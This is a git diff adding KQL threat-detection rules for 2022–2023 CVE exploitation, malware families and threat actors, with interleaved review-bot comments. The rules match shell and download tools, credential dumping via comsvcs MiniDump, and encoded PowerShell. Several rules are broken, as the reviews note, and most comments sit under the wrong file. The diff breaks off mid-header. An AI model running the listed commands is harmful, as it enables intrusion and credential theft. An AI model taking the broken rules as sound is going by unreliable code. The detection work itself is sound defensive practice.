diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-24527/cve_2022_24527_microsoft_connected_cache_lpe.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-24527/cve_2022_24527_microsoft_connected_cache_lpe.kql
new file mode 100644
index 00000000..997cc9fa
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-24527/cve_2022_24527_microsoft_connected_cache_lpe.kql
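Review bot: The `cmd.exe` branch only fires on the exact substring `/c powershell`, so `/k powershell`, `/c "powershell"` or `/c pwsh` spawned by `prunsrv.exe` pass, and the direct branch only lists `\\powershell.exe`, not `\\pwsh.exe`. If the intent is any PowerShell launched from the Tomcat service, `(ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh") and FolderPath endswith "\\cmd.exe"` plus `FolderPath endswith "\\pwsh.exe"` closes the gap at little false-positive cost given the parent constraint. The false-positive note in the header could also say explicitly that it refers to admin scripts run as `cmd.exe` children of `prunsrv.exe`, which is what the rule actually matches.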
@@ -0,0 +1,10 @@
+// Title: CVE-2022-24527 Microsoft Connected Cache LPE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-13
+// Level: high
+// Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.privilege-escalation, attack.t1059.001, cve.2022-24527, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath endswith "WindowsPowerShell\\Modules\\webAdministration\\webAdministration.psm1" and (not((RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26134/atlassian_confluence_cve_2022_26134.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26134/atlassian_confluence_cve_2022_26134.kql
new file mode 100644
index 00000000..a7410f63
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26134/atlassian_confluence_cve_2022_26134.kql
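Review bot: The exclusion `not((RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))` is meant to drop the legitimate `NT AUTHORITY`/`NT AUTORITÉ` writer, but per the Defender schema `RequestAccountName` describes the account that *remotely* initiated a file operation and is empty for local writes; `contains` on an empty value is false, the `not(...)` then passes, and SYSTEM-driven installs of the module would alert. The local actor is carried in `InitiatingProcessAccountDomain`/`InitiatingProcessAccountName`, and "NT AUTHORITY" is the domain part, so the filter should presumably read `not(InitiatingProcessAccountDomain contains "AUTHORI" or InitiatingProcessAccountDomain contains "AUTORI")` — please confirm on a live tenant. A short comment next to the filter stating that it exists to exempt the SYSTEM/service writer would help the next reader.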
@@ -0,0 +1,10 @@
+// Title: Atlassian Confluence CVE-2022-26134
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2022-26134, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java" and InitiatingProcessFolderPath startswith "/opt/atlassian/confluence/"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26809/potential_cve_2022_26809_exploitation_attempt.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26809/potential_cve_2022_26809_exploitation_attempt.kql
new file mode 100644
index 00000000..3249ce87
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26809/potential_cve_2022_26809_exploitation_attempt.kql
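Review bot: The parent constraint `InitiatingProcessFolderPath startswith "/opt/atlassian/confluence/"` assumes the bundled JRE under the default install path, so a Confluence running on a system JVM or installed elsewhere never matches even though the child-process pattern is still the indicator; the CVE-2023-22518 Linux rule in this same batch anchors on `InitiatingProcessCommandLine contains "confluence"` instead, and or-ing the two conditions would cover both layouts. Note also that `ProcessCommandLine contains "dash"`, `"ksh"`, `"fish"` are very short substrings (matching e.g. "dashboard") that are only tolerable because the Java parent is so restrictive; a header comment saying so would stop someone loosening the parent filter later.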
@@ -0,0 +1,12 @@
+// Title: Potential CVE-2022-26809 Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-13
+// Level: high
+// Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2022-26809, detection.emerging-threats
+// False Positives:
+// - Some cases in which the service spawned a werfault.exe process
+
+DeviceProcessEvents
+| where InitiatingProcessCommandLine contains "-k RPCSS" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-29072/potential_cve_2022_29072_exploitation_attempt.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-29072/potential_cve_2022_29072_exploitation_attempt.kql
new file mode 100644
index 00000000..cd3ae4cf
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-29072/potential_cve_2022_29072_exploitation_attempt.kql
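Review bot: The `where` line has no child-image filter at all, so it alerts on every process spawned by the `-k RPCSS` svchost, and the header itself lists `werfault.exe` as the known false positive; the Sysmon-parent rule in this batch excludes `WerFault.exe`/`WerFaultSecure.exe` and `conhost.exe` explicitly, so for consistency add `and not(FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe")` rather than only documenting the FP. The equality `InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"` also silently misses hosts whose system drive is not C:, whereas the other rules here use drive-agnostic `contains ":\\Windows\\System32\\..."` or `endswith`.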
@@ -0,0 +1,12 @@
+// Title: Potential CVE-2022-29072 Exploitation Attempt
+// Author: frack113, @kostastsale
+// Date: 2022-04-17
+// Level: high
+// Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.
+// 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.
+// The command runs in a child process under the 7zFM.exe process.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2022-29072, detection.emerging-threats
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\7zFM.exe") and (not((((ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r ") or (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".cmd" or ProcessCommandLine endswith ".ps1")) or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-30190/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-30190/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
new file mode 100644
index 00000000..442fa855
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-30190/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
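Review bot: The `isnull(ProcessCommandLine)` term in the exclusion will rarely do anything in Defender data, where a missing command line generally arrives as an empty string rather than null; since the rule's whole point is a shell spawned by `7zFM.exe` without a `/c`, `/k`, `/r` or script argument, the intent of that guard matters and `isempty(ProcessCommandLine)` (covering both null and "") is the safer spelling. The same `isnull` pattern appears in the Sysmon-parent rule further down, so this looks like a converter default worth fixing in `helper.py` rather than per rule.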
@@ -0,0 +1,10 @@
+// Title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190)
+// Author: Sittikorn S
+// Date: 2020-05-31
+// Level: medium
+// Description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1221, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt*"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-33891/apache_spark_shell_command_injection_processcreation.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-33891/apache_spark_shell_command_injection_processcreation.kql
new file mode 100644
index 00000000..70a91bea
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-33891/apache_spark_shell_command_injection_processcreation.kql
@@ -0,0 +1,12 @@
+// Title: Apache Spark Shell Command Injection - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-20
+// Level: high
+// Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2022-33891, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "id -Gn `" or ProcessCommandLine contains "id -Gn '") and InitiatingProcessFolderPath endswith "\\bash"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-41120/suspicious_sysmon_as_execution_parent.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-41120/suspicious_sysmon_as_execution_parent.kql
new file mode 100644
index 00000000..d9d5c139
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-41120/suspicious_sysmon_as_execution_parent.kql
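Review bot: `RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt*"` is a case-insensitive *equality*, and in KQL the trailing `*` is a literal character rather than a wildcard, so this rule can never match; the Sigma wildcard should have become `RegistryKey startswith "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\ms-msdt"` (Defender reports these keys under `SOFTWARE\Classes`, worth confirming on a tenant). The same literal-`*` translation appears in the ChromeLoader and Outlook-reminder rules in this batch, so the defect is in the converter's wildcard handling, not just this file. `Date: 2020-05-31` also predates CVE-2022-30190 by two years and is presumably a typo for 2022-05-31.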
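Review bot: `InitiatingProcessFolderPath endswith "\\bash"` uses a Windows backslash for what is a Linux parent path, so on a Linux sensor where the parent is e.g. `/usr/bin/bash` the rule never fires; the Confluence rules in this batch correctly use `endswith "/bash"` and `"/java"`, and this line should match them. The description also says the rule detects exploitation "via CVE-2014-6287", which is a different product's CVE and contradicts both the title and the `cve.2022-33891` tag; it should read CVE-2022-33891.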
@@ -0,0 +1,10 @@
+// Title: Suspicious Sysmon as Execution Parent
+// Author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault)
+// Date: 2022-11-10
+// Level: high
+// Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2022-41120, detection.emerging-threats
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\Sysmon.exe" or InitiatingProcessFolderPath endswith "\\Sysmon64.exe") and (not(((FolderPath contains ":\\Windows\\Sysmon.exe" or FolderPath contains ":\\Windows\\Sysmon64.exe" or FolderPath contains ":\\Windows\\System32\\conhost.exe" or FolderPath contains ":\\Windows\\System32\\WerFault.exe" or FolderPath contains ":\\Windows\\System32\\WerFaultSecure.exe" or FolderPath contains ":\\Windows\\System32\\wevtutil.exe" or FolderPath contains ":\\Windows\\SysWOW64\\wevtutil.exe") or isnull(FolderPath) or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe") and FolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/ChromeLoader/chromeloader_malware_execution.kql b/KQL/rules-emerging-threats/2022/Malware/ChromeLoader/chromeloader_malware_execution.kql
new file mode 100644
index 00000000..c8c23753
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/ChromeLoader/chromeloader_malware_execution.kql
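Review bot: The `isnull(FolderPath)` term in the exclusion is unlikely to exclude anything, because Defender normally emits an empty string rather than null when the image path is unavailable; `isempty(FolderPath)` covers both cases. Separately, the parent match `InitiatingProcessFolderPath endswith "\\Sysmon.exe" or ... "\\Sysmon64.exe"` only covers the default binary names, so a tenant that installs Sysmon under a custom service/binary name gets no coverage — worth a header comment such as `// NOTE: add your renamed Sysmon binary to the parent match if the service is not installed as Sysmon.exe/Sysmon64.exe`.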
@@ -0,0 +1,12 @@
+// Title: ChromeLoader Malware Execution
+// Author: @kostastsale
+// Date: 2022-01-10
+// Level: high
+// Description: Detects execution of ChromeLoader malware via a registered scheduled task
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001, attack.t1176, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine =~ "*--load-extension=\"*\\Appdata\\local\\chrome\"*" and FolderPath endswith "\\chrome.exe" and InitiatingProcessCommandLine contains "-ExecutionPolicy Bypass -WindowStyle Hidden -E JAB" and InitiatingProcessFolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Emotet/emotet_loader_execution_via_lnk_file.kql b/KQL/rules-emerging-threats/2022/Malware/Emotet/emotet_loader_execution_via_lnk_file.kql
new file mode 100644
index 00000000..82e4a93b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Emotet/emotet_loader_execution_via_lnk_file.kql
@@ -0,0 +1,13 @@
+// Title: Emotet Loader Execution Via .LNK File
+// Author: @kostastsale
+// Date: 2022-04-22
+// Level: high
+// Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.
+// The ".lnk" file was delivered via phishing campaign.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "findstr" and ProcessCommandLine contains ".vbs" and ProcessCommandLine contains ".lnk") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe")
\ No newline at end of file
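Review bot: `ProcessCommandLine =~ "*--load-extension=\"*\\Appdata\\local\\chrome\"*"` is an exact (case-insensitive) string comparison in which every `*` is a literal asterisk, so the first predicate never matches and the whole rule is dead. The Sigma wildcard pattern should become `ProcessCommandLine contains "--load-extension=\"" and ProcessCommandLine contains "\\Appdata\\local\\chrome\""` (or a `matches regex` if the ordering must be enforced), in line with the other `contains` terms already on this line.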
diff --git a/KQL/rules-emerging-threats/2022/Malware/Hermetic-Wiper/hermetic_wiper_tg_process_patterns.kql b/KQL/rules-emerging-threats/2022/Malware/Hermetic-Wiper/hermetic_wiper_tg_process_patterns.kql
new file mode 100644
index 00000000..e99facbe
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Hermetic-Wiper/hermetic_wiper_tg_process_patterns.kql
@@ -0,0 +1,10 @@
+// Title: Hermetic Wiper TG Process Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1021.001, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\policydefinitions\\postgresql.exe" or ((ProcessCommandLine contains "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp" or ProcessCommandLine contains " 1> \\\\127.0.0.1\\ADMIN$\\__16") or (ProcessCommandLine contains "powershell -c " and ProcessCommandLine contains "\\comsvcs.dll MiniDump " and ProcessCommandLine contains "\\winupd.log full"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/potential_raspberry_robin_dot_ending_file.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/potential_raspberry_robin_dot_ending_file.kql
new file mode 100644
index 00000000..acab6340
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/potential_raspberry_robin_dot_ending_file.kql
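Review bot: `ProcessCommandLine contains "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp"` will not match a real command line: `CSIDL_SYSTEM_DRIVE` is the path-normalisation token that vendor reports substitute for the drive letter, not something that appears in telemetry, so this branch is dead as written. `ProcessCommandLine contains ":\\temp\\sys.tmp"` keeps the intent and is drive-agnostic like the rest of the batch. The `" 1> \\\\127.0.0.1\\ADMIN$\\__16"` and comsvcs `MiniDump` branches look correct and are the higher-signal parts of this rule.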
@@ -0,0 +1,10 @@
+// Title: Potential Raspberry Robin Dot Ending File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-28
+// Level: high
+// Description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ "']{1}"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_initial_execution_from_external_drive.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_initial_execution_from_external_drive.kql
new file mode 100644
index 00000000..28c17306
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_initial_execution_from_external_drive.kql
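Review bot: The regex literal on the `where` line is syntactically broken: the character class `[ "']` contains an unescaped double quote inside a double-quoted KQL string, so the string literal ends there and the query will not parse. Escape it, e.g. `matches regex "\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}"`, or have the converter emit Sigma regexes as KQL verbatim strings (`@"..."` with embedded `"` doubled) so this cannot recur. `matches regex` is case-sensitive unlike the `contains`/`endswith` used elsewhere, which is harmless here because the classes already cover both cases, but a comment noting it would avoid surprises.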
@@ -0,0 +1,12 @@
+// Title: Raspberry Robin Initial Execution From External Drive
+// Author: @kostastsale
+// Date: 2022-05-06
+// Level: high
+// Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:") and ((ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and FolderPath endswith "\\msiexec.exe") and (InitiatingProcessCommandLine contains "/r" and (InitiatingProcessCommandLine endswith ".bin" or InitiatingProcessCommandLine endswith ".ico" or InitiatingProcessCommandLine endswith ".lnk" or InitiatingProcessCommandLine endswith ".lo" or InitiatingProcessCommandLine endswith ".sv" or InitiatingProcessCommandLine endswith ".usb") and InitiatingProcessFolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_subsequent_execution_of_commands.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_subsequent_execution_of_commands.kql
new file mode 100644
index 00000000..9379fc4c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_subsequent_execution_of_commands.kql
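Review bot: The title and description promise detection "from an external drive", but nothing on the `where` line constrains the drive; the actual indicators are a `cmd.exe /r` parent whose command line ends in `.bin`/`.ico`/`.lnk`/`.lo`/`.sv`/`.usb` and an `msiexec.exe` child fetching an `http(s):` URL with a quiet switch. I would add a header comment such as `// NOTE: the drive is not checked; the cmd /r <file> parent + msiexec /q <url> child is the signal` so analysts do not assume a removable-media condition is enforced.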
@@ -0,0 +1,12 @@
+// Title: Raspberry Robin Subsequent Execution of Commands
+// Author: @kostastsale
+// Date: 2022-05-06
+// Level: high
+// Description: Detects raspberry robin subsequent execution of commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "installdriver" or ProcessCommandLine contains "setfiledsndir" or ProcessCommandLine contains "vkipdse") and (ProcessCommandLine contains "odbcconf.exe" and ProcessCommandLine contains "regsvr" and ProcessCommandLine contains "shellexec_rundll") and (ProcessCommandLine endswith "-a" or ProcessCommandLine endswith "/a" or ProcessCommandLine endswith "–a" or ProcessCommandLine endswith "—a" or ProcessCommandLine endswith "―a" or ProcessCommandLine endswith "-f" or ProcessCommandLine endswith "/f" or ProcessCommandLine endswith "–f" or ProcessCommandLine endswith "—f" or ProcessCommandLine endswith "―f" or ProcessCommandLine endswith "-s" or ProcessCommandLine endswith "/s" or ProcessCommandLine endswith "–s" or ProcessCommandLine endswith "—s" or ProcessCommandLine endswith "―s") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe") and InitiatingProcessFolderPath endswith "\\fodhelper.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/Serpent-Backdoor/serpent_backdoor_payload_execution_via_scheduled_task.kql b/KQL/rules-emerging-threats/2022/Malware/Serpent-Backdoor/serpent_backdoor_payload_execution_via_scheduled_task.kql
new file mode 100644
index 00000000..52444c1c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/Serpent-Backdoor/serpent_backdoor_payload_execution_via_scheduled_task.kql
@@ -0,0 +1,14 @@
+// Title: Serpent Backdoor Payload Execution Via Scheduled Task
+// Author: @kostastsale
+// Date: 2022-03-21
+// Level: high
+// Description: Detects post exploitation execution technique of the Serpent backdoor.
+// According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method.
+// It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.006, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "[System/EventID=" and ProcessCommandLine contains "/create" and ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/ec" and ProcessCommandLine contains "/so" and ProcessCommandLine contains "/tn run") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/Malware/SocGholish/fakeupdates_socgholish_activity.kql b/KQL/rules-emerging-threats/2022/Malware/SocGholish/fakeupdates_socgholish_activity.kql
new file mode 100644
index 00000000..d809f987
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/Malware/SocGholish/fakeupdates_socgholish_activity.kql
@@ -0,0 +1,12 @@
+// Title: FakeUpdates/SocGholish Activity
+// Author: @kostastsale
+// Date: 2022-06-16
+// Level: high
+// Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessCommandLine contains "Chrome" or InitiatingProcessCommandLine contains "Edge" or InitiatingProcessCommandLine contains "Firefox" or InitiatingProcessCommandLine contains "Opera" or InitiatingProcessCommandLine contains "Brave" or InitiatingProcessCommandLine contains "Vivaldi") and (InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" and InitiatingProcessCommandLine contains ".zip" and InitiatingProcessCommandLine contains "update" and InitiatingProcessCommandLine contains ".js") and InitiatingProcessFolderPath endswith "\\wscript.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/TA/ACTINIUM/potential_actinium_persistence_activity.kql b/KQL/rules-emerging-threats/2022/TA/ACTINIUM/potential_actinium_persistence_activity.kql
new file mode 100644
index 00000000..daa38ffa
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/TA/ACTINIUM/potential_actinium_persistence_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential ACTINIUM Persistence Activity
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2022-02-07
+// Level: high
+// Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "create" and ProcessCommandLine contains "wscript" and ProcessCommandLine contains " /e:vbscript"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2022/TA/MERCURY/mercury_apt_activity.kql b/KQL/rules-emerging-threats/2022/TA/MERCURY/mercury_apt_activity.kql
new file mode 100644
index 00000000..bb9bdb08
--- /dev/null
+++ b/KQL/rules-emerging-threats/2022/TA/MERCURY/mercury_apt_activity.kql
@@ -0,0 +1,10 @@
+// Title: MERCURY APT Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-26
+// Level: high
+// Description: Detects suspicious command line patterns seen being used by MERCURY APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.g0069, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-exec bypass -w 1 -enc" and ProcessCommandLine contains "UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
new file mode 100644
index 00000000..83901817
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
@@ -0,0 +1,12 @@
+// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-11-14
+// Level: high
+// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/echo" or FolderPath endswith "/wget") and (InitiatingProcessCommandLine contains "confluence" and InitiatingProcessFolderPath endswith "/java")) and (not(ProcessCommandLine contains "ulimit -u"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
new file mode 100644
index 00000000..b6ff4139
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
@@ -0,0 +1,10 @@
+// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-11-14
+// Level: medium
+// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE"))) and (InitiatingProcessCommandLine contains "confluence" and (InitiatingProcessFolderPath endswith "\\tomcat8.exe" or InitiatingProcessFolderPath endswith "\\tomcat9.exe" or InitiatingProcessFolderPath endswith "\\tomcat10.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-23397/outlook_task_note_reminder_received.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-23397/outlook_task_note_reminder_received.kql
new file mode 100644
index 00000000..b80bf182
--- /dev/null
